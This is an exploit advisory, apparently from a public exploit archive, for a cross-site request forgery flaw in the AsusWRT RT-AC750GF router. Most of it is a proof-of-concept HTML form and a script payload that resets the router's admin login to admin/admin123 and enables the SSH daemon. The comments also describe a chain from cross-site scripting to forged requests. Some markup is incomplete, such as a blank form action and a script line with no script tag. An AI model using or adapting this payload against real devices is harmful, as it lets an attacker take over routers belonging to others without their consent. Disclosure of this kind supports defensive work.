AsusWRT RT-AC750GF Cross Site Request Forgery

AsusWRT RT-AC750GF suffers from a cross site request forgery vulnerability in the change admin password flow.

MD5 | 810fac6d0bec022e04d317564bc41737

# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-06-23
# Exploit Author: Wadeek
# Vendor Homepage:
# Firmware Link:
# Firmware Version:
# Tested on: ASUS RT-AC750GF with default firmware version

# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token}
# -> Change the router login password and enable SSH daemon)

<p>Proof Of Concept</p>
<!-- <form action="" method="POST"> -->
<form action="" method="POST">
<input type="hidden" name="action_mode" value="refresh_networkmap" />
<input type="text" id="current_page" name="current_page" value="" />
// set username at admin
// set password at admin123
// enable ssh daemon
document.getElementById("current_page").value = "start_apply.htm?productid=RT-AC53&current_page=Advanced_System_Content.asp&next_page=Advanced_System_Content.asp&modified=0&action_mode=apply&action_wait=5&action_script=restart_time%3Brestart_upnp&http_username=admin&http_passwd=admin123&http_passwd2=admin123&v_password2=admin123&sshd_enable=1&sshd_port=22&sshd_pass=1&sshd_authkeys=";
<input type="submit" value="" />

Related Posts